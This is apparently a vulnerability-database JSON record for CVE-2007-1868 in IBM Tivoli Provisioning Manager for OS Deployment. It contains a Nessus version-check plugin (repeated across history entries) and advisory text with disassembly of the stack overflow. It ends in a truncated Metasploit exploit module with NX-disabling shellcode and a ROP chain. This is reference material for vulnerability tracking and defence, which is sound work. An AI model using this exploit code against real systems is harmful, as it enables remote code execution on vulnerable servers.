"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is running IBM Tivoli Provisioning Manager for OS Deployment. The version of this software has multiple buffer overflow vulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or execute code on the remote host with the privileges of the TPM server.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a5d707b1311256cc26f7c718e33a981ff66711c862a473ad5048dabaf36801f8", "hashmap": [{"hash": "85a6c5133fe23e3fb62cd513e84dcfe6", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8dad7d1e40f541c1d75ace060f4569f3", "key": "references"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "20da9bf6c60b37a5b8675145f0c864a4", "key": "cvelist"}, {"hash": "bcda3dd992ec63798c57203a5174837f", "key": "href"}, {"hash": "c1eb153e88b304c888f879c8769e6f5b", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "2354ec2849bd2954df8dd2f2199d58a2", "key": "pluginID"}, {"hash": "76c0ef0b59b698ecbd2c12ca69581342", "key": "published"}, {"hash": "f5e850f1985da305c7f9475708cd4d52", "key": "modified"}, {"hash": "3614afb82498c2eae7cadd4b6504e12e", "key": "title"}, {"hash": "069b44d7d28f0d59f4f00d546b1e024d", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25149", "id": "IBM_TPMFOSD_OVERFLOW.NASL", "lastseen": "2018-09-01T23:59:06", "modified": "2018-07-12T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "25149", "published": "2007-05-03T00:00:00", "references": ["http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25149);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2007-1868\");\n script_bugtraq_id(23264);\n\n script_name(english:\"IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows\");\n script_summary(english:\"Gets IBM TPM for OS Deployment Server version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. The version of this software has multiple buffer overflow\nvulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://dvlabs.tippingpoint.com/advisory/TPTI-07-05\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install TPM for OS Deployment Fix Pack 2 with Interim Fix 2.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/01\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080, 443);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port:port);\nif (\"Server: Rembo\" >!< banner)\n exit (0);\n\nw = http_send_recv3(method:\"GET\", item:\"/builtin/index.html\", port:port);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\npat = '<p style=\"font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;\"><b>TPMfOSd ([0-9]+\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+) \\\\(build ([0-9]+\\\\.[0-9]+)\\\\)</b>.*';\n\nversion = egrep(pattern:pat, string:res);\nif (!version)\n exit (0);\n\nvers = ereg_replace(pattern:pat, string:version, replace:\"\\1\");\nvers = split (vers, sep:\".\", keep:FALSE);\n\nif ( (int(vers[0]) < 5) ||\n (int(vers[0]) == 5 && int(vers[1]) < 1) ||\n (int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) < 2) )\n security_hole(port);\n\nif ( int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) == 2 )\n{\n build = ereg_replace(pattern:pat, string:version, replace:\"\\2\");\n build = split (build, sep:\".\", keep:FALSE);\n\n if ( (int(build[0]) < 12) ||\n (int(build[0]) == 12 && int(build[1]) < 4) )\n security_hole(port);\n}\n", "title": "IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows", "type": "nessus", "viewCount": 1}, "differentElements": ["description"], "edition": 5, "lastseen": "2018-09-01T23:59:06"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ibm:tivoli_provisioning_manager_os_deployment"], "cvelist": ["CVE-2007-1868"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The remote host is running IBM Tivoli Provisioning Manager for OS Deployment. The version of this software has multiple buffer overflow vulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or execute code on the remote host with the privileges of the TPM server.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "c307db61c83e10c3011410605085bce39945afa45f1fe8610ada4332211d4110", "hashmap": [{"hash": "85a6c5133fe23e3fb62cd513e84dcfe6", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8dad7d1e40f541c1d75ace060f4569f3", "key": "references"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "20da9bf6c60b37a5b8675145f0c864a4", "key": "cvelist"}, {"hash": "bcda3dd992ec63798c57203a5174837f", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "c1eb153e88b304c888f879c8769e6f5b", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "2354ec2849bd2954df8dd2f2199d58a2", "key": "pluginID"}, {"hash": "76c0ef0b59b698ecbd2c12ca69581342", "key": "published"}, {"hash": "f5e850f1985da305c7f9475708cd4d52", "key": "modified"}, {"hash": "3614afb82498c2eae7cadd4b6504e12e", "key": "title"}, {"hash": "069b44d7d28f0d59f4f00d546b1e024d", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25149", "id": "IBM_TPMFOSD_OVERFLOW.NASL", "lastseen": "2018-08-30T19:51:13", "modified": "2018-07-12T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "25149", "published": "2007-05-03T00:00:00", "references": ["http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25149);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2007-1868\");\n script_bugtraq_id(23264);\n\n script_name(english:\"IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows\");\n script_summary(english:\"Gets IBM TPM for OS Deployment Server version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. The version of this software has multiple buffer overflow\nvulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://dvlabs.tippingpoint.com/advisory/TPTI-07-05\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install TPM for OS Deployment Fix Pack 2 with Interim Fix 2.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/01\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080, 443);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port:port);\nif (\"Server: Rembo\" >!< banner)\n exit (0);\n\nw = http_send_recv3(method:\"GET\", item:\"/builtin/index.html\", port:port);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\npat = '<p style=\"font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;\"><b>TPMfOSd ([0-9]+\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+) \\\\(build ([0-9]+\\\\.[0-9]+)\\\\)</b>.*';\n\nversion = egrep(pattern:pat, string:res);\nif (!version)\n exit (0);\n\nvers = ereg_replace(pattern:pat, string:version, replace:\"\\1\");\nvers = split (vers, sep:\".\", keep:FALSE);\n\nif ( (int(vers[0]) < 5) ||\n (int(vers[0]) == 5 && int(vers[1]) < 1) ||\n (int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) < 2) )\n security_hole(port);\n\nif ( int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) == 2 )\n{\n build = ereg_replace(pattern:pat, string:version, replace:\"\\2\");\n build = split (build, sep:\".\", keep:FALSE);\n\n if ( (int(build[0]) < 12) ||\n (int(build[0]) == 12 && int(build[1]) < 4) )\n security_hole(port);\n}\n", "title": "IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:51:13"}], "edition": 7, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "069b44d7d28f0d59f4f00d546b1e024d"}, {"key": "cvelist", "hash": "20da9bf6c60b37a5b8675145f0c864a4"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "c1eb153e88b304c888f879c8769e6f5b"}, {"key": "href", "hash": "bcda3dd992ec63798c57203a5174837f"}, {"key": "modified", "hash": "f5e850f1985da305c7f9475708cd4d52"}, {"key": "naslFamily", "hash": "07a0416e4de2a26a0531240b230d9eca"}, {"key": "pluginID", "hash": "2354ec2849bd2954df8dd2f2199d58a2"}, {"key": "published", "hash": "76c0ef0b59b698ecbd2c12ca69581342"}, {"key": "references", "hash": "8dad7d1e40f541c1d75ace060f4569f3"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "85a6c5133fe23e3fb62cd513e84dcfe6"}, {"key": "title", "hash": "3614afb82498c2eae7cadd4b6504e12e"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "a5d707b1311256cc26f7c718e33a981ff66711c862a473ad5048dabaf36801f8", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1868"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7526", "SECURITYVULNS:DOC:16934", "SECURITYVULNS:VULN:7566"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83093"]}, {"type": "osvdb", "idList": ["OSVDB:34678"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/IBM_TPMFOSD_OVERFLOW"]}, {"type": "nessus", "idList": ["IBM_TPMFOSD_CORRUPTION.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:16810"]}], "modified": "2019-02-21T01:09:52"}, "score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25149);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2007-1868\");\n script_bugtraq_id(23264);\n\n script_name(english:\"IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows\");\n script_summary(english:\"Gets IBM TPM for OS Deployment Server version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. The version of this software has multiple buffer overflow\nvulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://dvlabs.tippingpoint.com/advisory/TPTI-07-05\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install TPM for OS Deployment Fix Pack 2 with Interim Fix 2.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/01\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080, 443);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port:port);\nif (\"Server: Rembo\" >!< banner)\n exit (0);\n\nw = http_send_recv3(method:\"GET\", item:\"/builtin/index.html\", port:port);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\npat = '<p style=\"font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;\"><b>TPMfOSd ([0-9]+\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+) \\\\(build ([0-9]+\\\\.[0-9]+)\\\\)</b>.*';\n\nversion = egrep(pattern:pat, string:res);\nif (!version)\n exit (0);\n\nvers = ereg_replace(pattern:pat, string:version, replace:\"\\1\");\nvers = split (vers, sep:\".\", keep:FALSE);\n\nif ( (int(vers[0]) < 5) ||\n (int(vers[0]) == 5 && int(vers[1]) < 1) ||\n (int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) < 2) )\n security_hole(port);\n\nif ( int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) == 2 )\n{\n build = ereg_replace(pattern:pat, string:version, replace:\"\\2\");\n build = split (build, sep:\".\", keep:FALSE);\n\n if ( (int(build[0]) < 12) ||\n (int(build[0]) == 12 && int(build[1]) < 4) )\n security_hole(port);\n}\n", "naslFamily": "Web Servers", "pluginID": "25149", "cpe": ["cpe:/a:ibm:tivoli_provisioning_manager_os_deployment"], "scheme": null}
{"cve": [{"lastseen": "2017-07-29T11:21:57", "bulletinFamily": "NVD", "description": "The management service in IBM Tivoli Provisioning Manager for OS Deployment before 5.1 Fix Pack 2 does not properly handle multipart/form-data in HTTP POST requests, which allows remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via crafted POST requests to port 8080/tcp or 443/tcp.", "modified": "2017-07-28T21:31:04", "published": "2007-04-04T12:19:00", "id": "CVE-2007-1868", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1868", "title": "CVE-2007-1868", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:22", "bulletinFamily": "software", "description": "TPTI-07-05: IBM Tivoli Provisioning Manager for OS Deployment Multiple\r\n Stack Overflow Vulnerabilities\r\nhttp://dvlabs.tippingpoint.com/advisory/TPTI-07-05\r\nMay 2, 2007\r\n\r\n-- CVE ID:\r\nCVE-2007-1868\r\n\r\n-- Affected Vendor:\r\nIBM\r\n\r\n-- Affected Products:\r\nTivoli Provisioning Manager for OS Deployment\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nsystems with vulnerable installations of IBM Tivoli Provisioning\r\nManager for OS Deployment. Authentication is not required to exploit\r\nthis vulnerability.\r\n\r\nThe specific flaws exist in the handling of HTTP requests to the\r\nrembo.exe service listening on TCP port 8080. Several components of an\r\nHTTP request can be modified to trigger buffer overflows. For example,\r\nby supplying an overly long filename an attacker is able to overflow a\r\n150 byte stack buffer and subsequently execute arbitrary code. The\r\noverflow occurs during a string copy loop, shown here:\r\n\r\n 00431136 lea edi, [ebp+var_3C4] ; 150 byte stack buffer\r\n ...\r\n 00431148 stringcopy:\r\n 00431148 mov al, [edx] ; edx -> our data\r\n 0043114A add edx, 1\r\n 0043114D mov [edi], al ; edi -> stack buffer\r\n 0043114F add edi, 1\r\n 00431152 test al, al\r\n 00431154 jnz short stringcopy\r\n\r\nThe Host and Authorization fields are also vulnerable to similar\r\nexploitable overflows.\r\n\r\n-- Vendor Response:\r\nIBM has issued an update to correct this vulnerability. More details can\r\nbe found at:\r\n\r\n http://www-1.ibm.com/support/docview.wss?uid=swg24015664\r\n\r\n-- Disclosure Timeline:\r\n2006.12.18 - Vulnerability reported to vendor\r\n2007.05.02 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by Aaron Portnoy, TippingPoint\r\nSecurity Research Team.", "modified": "2007-05-04T00:00:00", "published": "2007-05-04T00:00:00", "id": "SECURITYVULNS:DOC:16934", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16934", "title": "TPTI-07-05: IBM Tivoli Provisioning Manager for OS Deployment Multiple Stack Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "Multiple vulnerabilities on parsing HTTP POST requests.", "modified": "2007-05-04T00:00:00", "published": "2007-05-04T00:00:00", "id": "SECURITYVULNS:VULN:7526", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7526", "title": "Tivoli Provisioning Manager for OS Deployment multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "Invalid handling of HTTP POST multipart/form-data requests to 8080/tcp or 443/tcp ports.", "modified": "2007-04-11T00:00:00", "published": "2007-04-11T00:00:00", "id": "SECURITYVULNS:VULN:7566", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7566", "title": "IBM Tivoli Provisioning Manager for OS Deployment DoS", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T06:33:46", "bulletinFamily": "exploit", "description": "IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow. CVE-2007-1868. Remote exploit for windows platform", "modified": "2010-09-20T00:00:00", "published": "2010-09-20T00:00:00", "id": "EDB-ID:16810", "href": "https://www.exploit-db.com/exploits/16810/", "type": "exploitdb", "title": "IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow", "sourceData": "##\r\n# $Id: ibm_tpmfosd_overflow.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager\r\n\t\t\t\tfor OS Deployment version 5.1.0.X.\r\n\t\t\t},\r\n\t\t\t'Author' => 'toto',\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-1868'],\r\n\t\t\t\t\t[ 'OSVDB', '34678'],\r\n\t\t\t\t\t[ 'BID', '23264'],\r\n\t\t\t\t\t[ 'URL', 'http://dvlabs.tippingpoint.com/advisory/TPTI-07-05' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 0x200,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c&=+?:;-,/#.\\\\$%\\x1a\",\r\n\t\t\t\t\t'Prepend' =>\r\n\t\t\t\t\t\t\t# Disable NX on 2k3 to upload data on the stack\r\n\t\t\t\t\t\t\t# (service crashes if the stack is switched to the heap)\r\n\t\t\t\t\t\t\t\"\\x64\\x8b\\x0d\\x30\\x00\\x00\\x00\" + # mov ecx, dword ptr fs:[0x30] ; PEB\r\n\t\t\t\t\t\t\t\"\\x83\\xb9\\xa4\\x00\\x00\\x00\\x05\" + # cmp dword ptr [ecx+0xa4], 5 ; MajorVersion == 5\r\n\t\t\t\t\t\t\t\"\\x75\\x30\" + # jnz after\r\n\t\t\t\t\t\t\t\"\\x83\\xb9\\xa8\\x00\\x00\\x00\\x02\" + # cmp dword ptr [ecx+0xa8], 2 ; MinorVersion == 2\r\n\t\t\t\t\t\t\t\"\\x75\\x27\" + # jnz after\r\n\t\t\t\t\t\t\t\"\\x81\\xb9\\xac\\x00\\x00\\x00\\xce\\x0e\\x00\\x00\" + # cmp dword ptr [ecx+0xac], 0xece ; BuildVersion (> SP0)\r\n\t\t\t\t\t\t\t\"\\x76\\x1b\" + # jbe after\r\n\t\t\t\t\t\t\t\"\\x8d\\x89\\xa8\\x00\\x00\\x00\" + # lea ecx, [ecx+0xa8]\r\n\t\t\t\t\t\t\t\"\\xba\\x00\\x03\\xfe\\x7f\" + # mov edx, 0x7ffe0300\r\n\t\t\t\t\t\t\t\"\\xb8\\xed\\x00\\x00\\x00\" + # mov eax, 0xed\r\n\t\t\t\t\t\t\t\"\\x6a\\x04\" + # push 4\r\n\t\t\t\t\t\t\t\"\\x51\" + # push ecx\r\n\t\t\t\t\t\t\t\"\\x6a\\x22\" + # push 22\r\n\t\t\t\t\t\t\t\"\\x6a\\xff\" + # push -1\r\n\t\t\t\t\t\t\t\"\\x6a\\xff\" + # push -1 (padding)\r\n\t\t\t\t\t\t\t\"\\xff\\x12\", # call dword ptr[edx]\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['TPMfOSD 5.1 (Windows 2000 SP4 - English)', { 'Rets' => [0x77bb53af, 0x77bb06f0, 0x75022ac5] }],\r\n\t\t\t\t\t# tested against 5.1.0.1 and 5.1.0.2 (use ATL.Dll)\r\n\t\t\t\t\t['TPMfOSD 5.1 (Windows 2003 All - English)', { 'IB' => 0x76a80000, 'Data' => 0x01061980 }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'May 02 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(443),\r\n\t\t\t\tOptBool.new('SSL', [true, 'Use SSL', true]),\r\n\t\t\t], self.class )\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tif target.name =~ /2003/\r\n\t\t\t# the exploit allocates and executable heap to copy and execute the payload\r\n\r\n\t\t\tauth = Rex::Text.rand_text_alphanumeric(2800)\r\n\r\n\t\t\tib = target['IB']\r\n\r\n\t\t\tauth[ 2080, 4 ] = [ ib + 0x11010 ].pack('V') # store a data to prevent a crash\r\n\r\n\t\t\t# ret 1:\r\n\t\t\t# 76a81a5f:\r\n\t\t\t# pop esi <- 0x76a91010\r\n\t\t\t# pop ebx <- 0x76a91010\r\n\t\t\t# pop ebp <- 0x76a91010\r\n\t\t\t# retn\r\n\r\n\t\t\tauth[ 2096, 4 ] = [ ib + 0x1a5f ].pack('V')\r\n\t\t\tauth[ 2100, 4 ] = [ target['Data'] ].pack('V')\r\n\t\t\tauth[ 2104, 4 ] = [ ib + 0x11010 ].pack('V')\r\n\t\t\tauth[ 2108, 4 ] = [ ib + 0x11010 ].pack('V')\r\n\r\n\t\t\t# ret 2:\r\n\t\t\t# 76a817f0:\r\n\t\t\t# pop esi <- 0x76a81512 (ocscpy pointer)\r\n\t\t\t# retn\r\n\r\n\t\t\tauth[ 2112, 4 ] = [ ib + 0x17f0 ].pack('V')\r\n\t\t\tauth[ 2116, 4 ] = [ ib + 0x1512 ].pack('V')\r\n\r\n\t\t\t# ret 3: (copy the payload in atl.dll data)\r\n\t\t\t# 76a811c8\r\n\t\t\t# lea eax, [esp+3c] <-- eax points to the payload\r\n\t\t\t# push eax <- payload\r\n\t\t\t# push ebp <- 0x76a91010\r\n\t\t\t# call esi <- ocscpy\r\n\t\t\t# cmp eax, ebx <- eax == ebx = 0x76a91010\r\n\t\t\t# jnz before <- jump not taken\r\n\t\t\t# mov eax, ebp\r\n\t\t\t# pop edi\r\n\t\t\t# pop esi\r\n\t\t\t# pop ebp\r\n\t\t\t# pop ebx\r\n\t\t\t# add esp, 1ch\r\n\t\t\t# retn\r\n\r\n\t\t\tauth[ 2120, 4 ] = [ ib + 0x11c8 ].pack('V')\r\n\r\n\r\n\t\t\t# ret 4: (increase the stack pointer to allow a jump back in the payload)\r\n\t\t\t# add esp, 1ch\r\n\t\t\t# retn\r\n\r\n\t\t\tauth[ 2160, 4 ] = [ ib + 0x11da ].pack('V')\r\n\t\t\tauth[ 2184, 2 ] = \"\\xeb\\x56\" # jmp payload\r\n\r\n\r\n\t\t\t# ret 5: (create an executable heap - huge one)\r\n\t\t\t# 76a8c0c4\r\n\t\t\t# jmp ds:__imp_HeapCreate (0xffffffff, 0x01010101, 0x01010101)\r\n\r\n\t\t\tauth[ 2196, 4 ] = [ ib + 0xc0c4 ].pack('V')\r\n\r\n\t\t\t# 